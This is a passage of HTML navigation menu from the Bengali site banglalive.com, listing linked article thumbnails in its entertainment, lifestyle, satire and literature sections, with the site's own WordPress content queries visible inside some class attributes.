                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/queen-victoria-never-was-willing-to-breastfeed-her-children/" rel="bookmark" title="সন্তানদের স্তন্যপান না করিয়ে রাজ পরিবারের রীতি ভেঙেছিলেন এই সম্রাজ্ঞী">সন্তানদের স্তন্যপান না করিয়ে রাজ পরিবারের রীতি ভেঙেছিলেন এই সম্রাজ্ঞী</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://banglalive.com/mother-is-learning-english-to-read-daughters-book/" rel="bookmark" title="মেয়ের লেখা বই পড়বেন বলে ইংরেজি শিখছেন মা"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/08/malala-new-198x143.jpg" alt="" title="মেয়ের লেখা বই পড়বেন বলে ইংরেজি শিখছেন মা"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/mother-is-learning-english-to-read-daughters-book/" rel="bookmark" title="মেয়ের লেখা বই পড়বেন বলে ইংরেজি শিখছেন মা">মেয়ের লেখা বই পড়বেন বলে ইংরেজি শিখছেন মা</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://banglalive.com/chala-jaata-hoon-kisi-ki-dhun-me-dhadakte-dil-ke-taraane-liye/" rel="bookmark" title="কঠিন মুহূর্তের গোপন সঙ্গীকে জন্মদিনে স্মরণ করলেন বীরেন্দ্র শেওয়াগ"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/08/sehwag-new-198x143.jpg" alt="" title="কঠিন মুহূর্তের গোপন সঙ্গীকে জন্মদিনে স্মরণ করলেন বীরেন্দ্র শেওয়াগ"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/chala-jaata-hoon-kisi-ki-dhun-me-dhadakte-dil-ke-taraane-liye/" rel="bookmark" title="কঠিন মুহূর্তের গোপন সঙ্গীকে জন্মদিনে স্মরণ করলেন বীরেন্দ্র শেওয়াগ">কঠিন মুহূর্তের গোপন সঙ্গীকে জন্মদিনে স্মরণ করলেন বীরেন্দ্র শেওয়াগ</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://banglalive.com/the-karnataka-farmer-asks-govt-to-find-him-a-bride/" rel="bookmark" title="বিয়ের পাত্রী খুঁজে পেতে সরকারের দ্বারস্থ কৃষক!"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/08/farmers-plea-for-marriage-198x143.gif" alt="" title="বিয়ের পাত্রী খুঁজে পেতে সরকারের দ্বারস্থ কৃষক!"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/the-karnataka-farmer-asks-govt-to-find-him-a-bride/" rel="bookmark" title="বিয়ের পাত্রী খুঁজে পেতে সরকারের দ্বারস্থ কৃষক!">বিয়ের পাত্রী খুঁজে পেতে সরকারের দ্বারস্থ কৃষক!</a></h4>            </div>
        </div>
        </div><div class="td-next-prev-wrap"><a href="#" class="td_ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_1_598490d30b220" data-td_block_id="td_uid_1_598490d30b220"></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_1_598490d30b220" data-td_block_id="td_uid_1_598490d30b220"></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent td-menu-item td-mega-menu menu-item-136749"><a href="http://banglalive.com/category/entertainment/">বিনোদন</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-mega-grid"><script>var block_td_uid_3_598490d31fa57 = new td_block();
block_td_uid_3_598490d31fa57.id = "td_uid_3_598490d31fa57";
block_td_uid_3_598490d31fa57.atts = '{"limit":4,"td_column_number":3,"ajax_pagination":"next_prev","category_id":"164","show_child_cat":"5"}';
block_td_uid_3_598490d31fa57.td_cur_cat = "164";
block_td_uid_3_598490d31fa57.td_column_number = "1";
block_td_uid_3_598490d31fa57.block_type = "td_mega_menu";
block_td_uid_3_598490d31fa57.post_count = "4";
block_td_uid_3_598490d31fa57.found_posts = "4823";
block_td_uid_3_598490d31fa57.max_num_pages = "1206";
block_td_uid_3_598490d31fa57.header_color = "";
block_td_uid_3_598490d31fa57.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_3_598490d31fa57);
</script><div class="td_block_wrap td_block_mega_menu"><div class="td_mega_menu_sub_cats"><div class="block-mega-child-cats"><div><a class="cur-sub-cat ajax-sub-cat-mega sub-cat-td_uid_3_598490d31fa57" id="sub-cat-td_uid_3_598490d31fa57-164" data-cat_id="164"
                        data-td_block_id="td_uid_3_598490d31fa57" href="http://banglalive.com/category/entertainment/">All</a></div><div><a class="ajax-sub-cat-mega sub-cat-td_uid_3_598490d31fa57" id="sub-cat-td_uid_3_598490d31fa57-4" data-cat_id="4" data-td_block_id="td_uid_3_598490d31fa57" href="http://banglalive.com/category/entertainment/entertainment-news/">Hottie কালচার</a></div><div><a class="ajax-sub-cat-mega sub-cat-td_uid_3_598490d31fa57" id="sub-cat-td_uid_3_598490d31fa57-5" data-cat_id="5" data-td_block_id="td_uid_3_598490d31fa57" href="http://banglalive.com/category/entertainment/entertainment-interview/">মুখোমুখি</a></div><div><a class="ajax-sub-cat-mega sub-cat-td_uid_3_598490d31fa57" id="sub-cat-td_uid_3_598490d31fa57-6" data-cat_id="6" data-td_block_id="td_uid_3_598490d31fa57" href="http://banglalive.com/category/entertainment/entertainment-review/">হিট না ঢিট</a></div></div></div><div id=td_uid_3_598490d31fa57 class="td_block_inner animated fadeInDown SELECT SQL_CALC_FOUND_ROWS  wp_posts.ID FROM wp_posts  LEFT JOIN wp_term_relationships ON (wp_posts.ID = wp_term_relationships.object_id) WHERE 1=1  AND ( 
  wp_term_relationships.term_taxonomy_id IN (4,5,6,164)
) AND wp_posts.post_type IN ('post', 'page', 'attachment', 'revision', 'nav_menu_item', 'custom_css', 'customize_changeset', 'forum', 'topic', 'reply', 'wpc-weather', 'wpcf7_contact_form', 'ngg_album', 'ngg_gallery', 'ngg_pictures', 'lightbox_library', 'contestants', 'blogs', 'astro', 'displayed_gallery', 'display_type', 'gal_display_source') AND ((wp_posts.post_status = 'publish')) GROUP BY wp_posts.ID ORDER BY wp_posts.post_date DESC LIMIT 0, 4">
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://banglalive.com/kishore-kumaar-was-not-happy-with-his-married-life/" rel="bookmark" title="বিবাহিত জীবনে সুখী হতে পারেননি কিশোর কুমার"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/08/kishore-new-198x143.jpg" alt="" title="বিবাহিত জীবনে সুখী হতে পারেননি কিশোর কুমার"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/kishore-kumaar-was-not-happy-with-his-married-life/" rel="bookmark" title="বিবাহিত জীবনে সুখী হতে পারেননি কিশোর কুমার">বিবাহিত জীবনে সুখী হতে পারেননি কিশোর কুমার</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://banglalive.com/some-lesserknown-stories-of-kishore-kumar/" rel="bookmark" title="আজ জন্মদিন‚ চেনা কিশোরের অজানা কিছু গল্প&#8230;"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2016/08/kishore-kumar-unknown-198x143.jpg" alt="kishore Kumar unknown stories" title="আজ জন্মদিন‚ চেনা কিশোরের অজানা কিছু গল্প&#8230;"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/some-lesserknown-stories-of-kishore-kumar/" rel="bookmark" title="আজ জন্মদিন‚ চেনা কিশোরের অজানা কিছু গল্প&#8230;">আজ জন্মদিন‚ চেনা কিশোরের অজানা কিছু গল্প&#8230;</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://banglalive.com/lipstick-under-my-burkha-film-review-in-bengali/" rel="bookmark" title="এমন একটা ছবি, যেখানে নম্বর কাটার কোথাও কোন সুযোগই নেই"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/08/lipstick-under-my-burkha-film-review-198x143.gif" alt="" title="এমন একটা ছবি, যেখানে নম্বর কাটার কোথাও কোন সুযোগই নেই"/></a><div class="eng-sanny-2 rating-movies21">
        <!--Yasr Overall Rating Shortcode-->
        <div class="rateit yasr_visitor_votes_stars_div" id="yasr_rateit_overall" data-rateit-starwidth="16" data-rateit-starheight="16" data-rateit-value="5" data-rateit-step="0.1" data-rateit-resetable="false" data-rateit-readonly="true"></div>
        <!--End Yasr Overall Rating Shortcode-->
         </div></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/lipstick-under-my-burkha-film-review-in-bengali/" rel="bookmark" title="এমন একটা ছবি, যেখানে নম্বর কাটার কোথাও কোন সুযোগই নেই">এমন একটা ছবি, যেখানে নম্বর কাটার কোথাও কোন সুযোগই নেই</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://banglalive.com/imitiaz-alis-first-meeting-srk-included-gauri-khan-drunk-crazy-fan-wrapped-around/" rel="bookmark" title="শাহরুখ‚ গৌরী ও এক মাতাল মহিলা ফ্যান &#8211; যব হ্যারি মেট ইমতিয়াজ আলি!?"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/08/harry-1-198x143.jpg" alt="" title="শাহরুখ‚ গৌরী ও এক মাতাল মহিলা ফ্যান &#8211; যব হ্যারি মেট ইমতিয়াজ আলি!?"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/imitiaz-alis-first-meeting-srk-included-gauri-khan-drunk-crazy-fan-wrapped-around/" rel="bookmark" title="শাহরুখ‚ গৌরী ও এক মাতাল মহিলা ফ্যান &#8211; যব হ্যারি মেট ইমতিয়াজ আলি!?">শাহরুখ‚ গৌরী ও এক মাতাল মহিলা ফ্যান &#8211; যব হ্যারি মেট ইমতিয়াজ আলি!?</a></h4>            </div>
        </div>
        </div><div class="td-next-prev-wrap"><a href="#" class="td_ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_3_598490d31fa57" data-td_block_id="td_uid_3_598490d31fa57"></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_3_598490d31fa57" data-td_block_id="td_uid_3_598490d31fa57"></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-136369"><a href="http://banglalive.com/category/lifestyle/">লাইফস্টাইল</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-mega-grid"><script>var block_td_uid_5_598490d332fcf = new td_block();
block_td_uid_5_598490d332fcf.id = "td_uid_5_598490d332fcf";
block_td_uid_5_598490d332fcf.atts = '{"limit":4,"td_column_number":3,"ajax_pagination":"next_prev","category_id":"140","show_child_cat":"5"}';
block_td_uid_5_598490d332fcf.td_cur_cat = "140";
block_td_uid_5_598490d332fcf.td_column_number = "1";
block_td_uid_5_598490d332fcf.block_type = "td_mega_menu";
block_td_uid_5_598490d332fcf.post_count = "4";
block_td_uid_5_598490d332fcf.found_posts = "596";
block_td_uid_5_598490d332fcf.max_num_pages = "149";
block_td_uid_5_598490d332fcf.header_color = "";
block_td_uid_5_598490d332fcf.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_5_598490d332fcf);
</script><div class="td_block_wrap td_block_mega_menu"><div class="td_mega_menu_sub_cats"><div class="block-mega-child-cats"><div><a class="cur-sub-cat ajax-sub-cat-mega sub-cat-td_uid_5_598490d332fcf" id="sub-cat-td_uid_5_598490d332fcf-140" data-cat_id="140"
                        data-td_block_id="td_uid_5_598490d332fcf" href="http://banglalive.com/category/lifestyle/">All</a></div><div><a class="ajax-sub-cat-mega sub-cat-td_uid_5_598490d332fcf" id="sub-cat-td_uid_5_598490d332fcf-266" data-cat_id="266" data-td_block_id="td_uid_5_598490d332fcf" href="http://banglalive.com/category/lifestyle/household-tips-to-ensure-a-happy-and-healthy-life/">জেনে রাখা ভালো</a></div><div><a class="ajax-sub-cat-mega sub-cat-td_uid_5_598490d332fcf" id="sub-cat-td_uid_5_598490d332fcf-9" data-cat_id="9" data-td_block_id="td_uid_5_598490d332fcf" href="http://banglalive.com/category/lifestyle/health-news-and-health-tips-in-bengali/">স্বাস্থ্য</a></div><div><a class="ajax-sub-cat-mega sub-cat-td_uid_5_598490d332fcf" id="sub-cat-td_uid_5_598490d332fcf-10" data-cat_id="10" data-td_block_id="td_uid_5_598490d332fcf" href="http://banglalive.com/category/lifestyle/fashion-news/">সৌন্দর্য</a></div></div></div><div id=td_uid_5_598490d332fcf class="td_block_inner animated fadeInDown SELECT SQL_CALC_FOUND_ROWS  wp_posts.ID FROM wp_posts  LEFT JOIN wp_term_relationships ON (wp_posts.ID = wp_term_relationships.object_id) WHERE 1=1  AND ( 
  wp_term_relationships.term_taxonomy_id IN (9,10,140,266)
) AND wp_posts.post_type IN ('post', 'page', 'attachment', 'revision', 'nav_menu_item', 'custom_css', 'customize_changeset', 'forum', 'topic', 'reply', 'wpc-weather', 'wpcf7_contact_form', 'ngg_album', 'ngg_gallery', 'ngg_pictures', 'lightbox_library', 'contestants', 'blogs', 'astro', 'displayed_gallery', 'display_type', 'gal_display_source') AND ((wp_posts.post_status = 'publish')) GROUP BY wp_posts.ID ORDER BY wp_posts.post_date DESC LIMIT 0, 4">
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://banglalive.com/home-remedies-to-make-your-eyebrows-thicker/" rel="bookmark" title="আই ব্রো পাতলা? ঘন ও সুন্দর করে তুলতে জেনে নিন ঘরোয়া টোটকা"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/08/eyebrows-new-198x143.jpg" alt="" title="আই ব্রো পাতলা? ঘন ও সুন্দর করে তুলতে জেনে নিন ঘরোয়া টোটকা"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/home-remedies-to-make-your-eyebrows-thicker/" rel="bookmark" title="আই ব্রো পাতলা? ঘন ও সুন্দর করে তুলতে জেনে নিন ঘরোয়া টোটকা">আই ব্রো পাতলা? ঘন ও সুন্দর করে তুলতে জেনে নিন ঘরোয়া টোটকা</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://banglalive.com/5-signs-your-sex-life-needs-a-makeover/" rel="bookmark" title="৫টি এমন বিষয় যা বোঝায় আপনার যৌন জীবনের মেক ওভার দরকার"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/08/sex-makeover-198x143.jpg" alt="" title="৫টি এমন বিষয় যা বোঝায় আপনার যৌন জীবনের মেক ওভার দরকার"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/5-signs-your-sex-life-needs-a-makeover/" rel="bookmark" title="৫টি এমন বিষয় যা বোঝায় আপনার যৌন জীবনের মেক ওভার দরকার">৫টি এমন বিষয় যা বোঝায় আপনার যৌন জীবনের মেক ওভার দরকার</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://banglalive.com/10-ways-help-child-handle-stress/" rel="bookmark" title="আপনার বাচ্চা স্ট্রেসের শিকার নয় তো? ১০টি উপায়ে আপনি ওকে সাহায্য করতে পারেন"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/08/stress-new-198x143.jpg" alt="" title="আপনার বাচ্চা স্ট্রেসের শিকার নয় তো? ১০টি উপায়ে আপনি ওকে সাহায্য করতে পারেন"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/10-ways-help-child-handle-stress/" rel="bookmark" title="আপনার বাচ্চা স্ট্রেসের শিকার নয় তো? ১০টি উপায়ে আপনি ওকে সাহায্য করতে পারেন">আপনার বাচ্চা স্ট্রেসের শিকার নয় তো? ১০টি উপায়ে আপনি ওকে সাহায্য করতে পারেন</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://banglalive.com/amazing-health-benefits-pineapples/" rel="bookmark" title="খেয়ে পুষ্টি‚ খাইয়ে তুষ্টি ! আনারসের কানায় কানায় ভর্তি গুণাগুণ"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/07/pineapple-new-198x143.jpg" alt="" title="খেয়ে পুষ্টি‚ খাইয়ে তুষ্টি ! আনারসের কানায় কানায় ভর্তি গুণাগুণ"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/amazing-health-benefits-pineapples/" rel="bookmark" title="খেয়ে পুষ্টি‚ খাইয়ে তুষ্টি ! আনারসের কানায় কানায় ভর্তি গুণাগুণ">খেয়ে পুষ্টি‚ খাইয়ে তুষ্টি ! আনারসের কানায় কানায় ভর্তি গুণাগুণ</a></h4>            </div>
        </div>
        </div><div class="td-next-prev-wrap"><a href="#" class="td_ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_5_598490d332fcf" data-td_block_id="td_uid_5_598490d332fcf"></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_5_598490d332fcf" data-td_block_id="td_uid_5_598490d332fcf"></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-177970"><a href="http://banglalive.com/category/travelove-the-best-travel-experiences/">ট্র্যাভেলাভ</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-136750"><a href="http://banglalive.com/category/bakalam/">বকলম</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-mega-grid"><script>var block_td_uid_7_598490d341abd = new td_block();
block_td_uid_7_598490d341abd.id = "td_uid_7_598490d341abd";
block_td_uid_7_598490d341abd.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"46","show_child_cat":"5"}';
block_td_uid_7_598490d341abd.td_cur_cat = "46";
block_td_uid_7_598490d341abd.td_column_number = "1";
block_td_uid_7_598490d341abd.block_type = "td_mega_menu";
block_td_uid_7_598490d341abd.post_count = "5";
block_td_uid_7_598490d341abd.found_posts = "100";
block_td_uid_7_598490d341abd.max_num_pages = "20";
block_td_uid_7_598490d341abd.header_color = "";
block_td_uid_7_598490d341abd.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_7_598490d341abd);
</script><div class="td_block_wrap td_block_mega_menu td-no-subcats"><div id=td_uid_7_598490d341abd class="td_block_inner animated fadeInDown SELECT SQL_CALC_FOUND_ROWS  wp_posts.ID FROM wp_posts  LEFT JOIN wp_term_relationships ON (wp_posts.ID = wp_term_relationships.object_id) WHERE 1=1  AND ( 
  wp_term_relationships.term_taxonomy_id IN (46)
) AND wp_posts.post_type IN ('post', 'page', 'attachment', 'revision', 'nav_menu_item', 'custom_css', 'customize_changeset', 'forum', 'topic', 'reply', 'wpc-weather', 'wpcf7_contact_form', 'ngg_album', 'ngg_gallery', 'ngg_pictures', 'lightbox_library', 'contestants', 'blogs', 'astro', 'displayed_gallery', 'display_type', 'gal_display_source') AND ((wp_posts.post_status = 'publish')) GROUP BY wp_posts.ID ORDER BY wp_posts.post_date DESC LIMIT 0, 5">
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://banglalive.com/if-rabindranatha-tagore-and-salil-chowdhury-had-met-each-other/" rel="bookmark" title="রবি–সলিল-এর হঠাৎ দেখা"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/07/rabindranatha-tagore-salil-chowdhury-feature-198x143.jpg" alt="" title="রবি–সলিল-এর হঠাৎ দেখা"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/if-rabindranatha-tagore-and-salil-chowdhury-had-met-each-other/" rel="bookmark" title="রবি–সলিল-এর হঠাৎ দেখা">রবি–সলিল-এর হঠাৎ দেখা</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://banglalive.com/uttam-suchitra-supriya-chhabi-biswas-and-a-mega-serial/" rel="bookmark" title="মেগা সিরিয়ালে উত্তম, সুচিত্রা, সুপ্রিয়া, ছবি &#8230;&#8230;।।"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/06/uttam-suchitra-tv-serial-198x143.jpg" alt="" title="মেগা সিরিয়ালে উত্তম, সুচিত্রা, সুপ্রিয়া, ছবি &#8230;&#8230;।।"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/uttam-suchitra-supriya-chhabi-biswas-and-a-mega-serial/" rel="bookmark" title="মেগা সিরিয়ালে উত্তম, সুচিত্রা, সুপ্রিয়া, ছবি &#8230;&#8230;।।">মেগা সিরিয়ালে উত্তম, সুচিত্রা, সুপ্রিয়া, ছবি &#8230;&#8230;।।</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://banglalive.com/live-from-the-meeting-of-cows-and-other-animals/" rel="bookmark" title="গোরুর মুখের খবর"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/06/meeting-of-cows-198x143.jpg" alt="" title="গোরুর মুখের খবর"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/live-from-the-meeting-of-cows-and-other-animals/" rel="bookmark" title="গোরুর মুখের খবর">গোরুর মুখের খবর</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://banglalive.com/journalists-you-should-be-prepared-to-be-beaten-up/" rel="bookmark" title="সাংবাদিক তুমি&#8230;।।"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/05/journalists-beaten-by-police-198x143.jpg" alt="" title="সাংবাদিক তুমি&#8230;।।"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/journalists-you-should-be-prepared-to-be-beaten-up/" rel="bookmark" title="সাংবাদিক তুমি&#8230;।।">সাংবাদিক তুমি&#8230;।।</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://banglalive.com/chicken-and-duck-discuss-about-the-plastic-egg-rumor/" rel="bookmark" title="তৈরি প্লাস্টিকের ডিম, হাঁস-মুরগির তা-ধিন-ধিন"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/04/plastic-egg-and-chicken-198x143.jpg" alt="" title="তৈরি প্লাস্টিকের ডিম, হাঁস-মুরগির তা-ধিন-ধিন"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/chicken-and-duck-discuss-about-the-plastic-egg-rumor/" rel="bookmark" title="তৈরি প্লাস্টিকের ডিম, হাঁস-মুরগির তা-ধিন-ধিন">তৈরি প্লাস্টিকের ডিম, হাঁস-মুরগির তা-ধিন-ধিন</a></h4>            </div>
        </div>
        </div><div class="td-next-prev-wrap"><a href="#" class="td_ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_7_598490d341abd" data-td_block_id="td_uid_7_598490d341abd"></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_7_598490d341abd" data-td_block_id="td_uid_7_598490d341abd"></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-195536"><a href="http://banglalive.com/category/best-literature-content-in-bengali/">সাহিত্য</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-mega-grid"><script>var block_td_uid_9_598490d358da2 = new td_block();
block_td_uid_9_598490d358da2.id = "td_uid_9_598490d358da2";
block_td_uid_9_598490d358da2.atts = '{"limit":4,"td_column_number":3,"ajax_pagination":"next_prev","category_id":"141","show_child_cat":"5"}';
block_td_uid_9_598490d358da2.td_cur_cat = "141";
block_td_uid_9_598490d358da2.td_column_number = "1";
block_td_uid_9_598490d358da2.block_type = "td_mega_menu";
block_td_uid_9_598490d358da2.post_count = "4";
block_td_uid_9_598490d358da2.found_posts = "171";
block_td_uid_9_598490d358da2.max_num_pages = "43";
block_td_uid_9_598490d358da2.header_color = "";
block_td_uid_9_598490d358da2.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_9_598490d358da2);
</script><div class="td_block_wrap td_block_mega_menu"><div class="td_mega_menu_sub_cats"><div class="block-mega-child-cats"><div><a class="cur-sub-cat ajax-sub-cat-mega sub-cat-td_uid_9_598490d358da2" id="sub-cat-td_uid_9_598490d358da2-141" data-cat_id="141"
                        data-td_block_id="td_uid_9_598490d358da2" href="http://banglalive.com/category/best-literature-content-in-bengali/">All</a></div><div><a class="ajax-sub-cat-mega sub-cat-td_uid_9_598490d358da2" id="sub-cat-td_uid_9_598490d358da2-271" data-cat_id="271" data-td_block_id="td_uid_9_598490d358da2" href="http://banglalive.com/category/best-literature-content-in-bengali/bengali-funny-stories-told-with-pictures/">ছবিতে গল্প</a></div><div><a class="ajax-sub-cat-mega sub-cat-td_uid_9_598490d358da2" id="sub-cat-td_uid_9_598490d358da2-273" data-cat_id="273" data-td_block_id="td_uid_9_598490d358da2" href="http://banglalive.com/category/best-literature-content-in-bengali/satirical-articles-in-bengali/">রম্যরচনা</a></div><div><a class="ajax-sub-cat-mega sub-cat-td_uid_9_598490d358da2" id="sub-cat-td_uid_9_598490d358da2-16" data-cat_id="16" data-td_block_id="td_uid_9_598490d358da2" href="http://banglalive.com/category/best-literature-content-in-bengali/galpa/">গল্প</a></div><div><a class="ajax-sub-cat-mega sub-cat-td_uid_9_598490d358da2" id="sub-cat-td_uid_9_598490d358da2-241" data-cat_id="241" data-td_block_id="td_uid_9_598490d358da2" href="http://banglalive.com/category/best-literature-content-in-bengali/special-feature/">বিশেষ রচনা</a></div><div><a class="ajax-sub-cat-mega sub-cat-td_uid_9_598490d358da2" id="sub-cat-td_uid_9_598490d358da2-18" data-cat_id="18" data-td_block_id="td_uid_9_598490d358da2" href="http://banglalive.com/category/best-literature-content-in-bengali/dharabahik/">উপন্যাস</a></div></div></div><div id=td_uid_9_598490d358da2 class="td_block_inner animated fadeInDown SELECT SQL_CALC_FOUND_ROWS  wp_posts.ID FROM wp_posts  LEFT JOIN wp_term_relationships ON (wp_posts.ID = wp_term_relationships.object_id) WHERE 1=1  AND ( 
  wp_term_relationships.term_taxonomy_id IN (16,17,18,141,240,241,242,271,273)
) AND wp_posts.post_type IN ('post', 'page', 'attachment', 'revision', 'nav_menu_item', 'custom_css', 'customize_changeset', 'forum', 'topic', 'reply', 'wpc-weather', 'wpcf7_contact_form', 'ngg_album', 'ngg_gallery', 'ngg_pictures', 'lightbox_library', 'contestants', 'blogs', 'astro', 'displayed_gallery', 'display_type', 'gal_display_source') AND ((wp_posts.post_status = 'publish')) GROUP BY wp_posts.ID ORDER BY wp_posts.post_date DESC LIMIT 0, 4">
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://banglalive.com/uttam-kumar-will-remain-the-biggest-star-of-bengali-films-for-ever/" rel="bookmark" title="সবার ওপরে"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/07/uttam-kumar-feature-198x143.jpg" alt="" title="সবার ওপরে"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/uttam-kumar-will-remain-the-biggest-star-of-bengali-films-for-ever/" rel="bookmark" title="সবার ওপরে">সবার ওপরে</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="http://banglalive.com/the-confession-of-a-murder-accused-a-bengali-story/" rel="bookmark" title="মন্থন"><img width="198" height="143" itemprop="image" class="entry-thumb" src="http://blcdn-307f.kxcdn.com/wp-content/uploads/2017/07/Bengali-story-manthan-198x143.jpg" alt="" title="মন্থন"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="http://banglalive.com/the-confession-of-a-murder-accused-a-bengali-story/" rel="bookmark" title="মন্থন">মন্থন</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
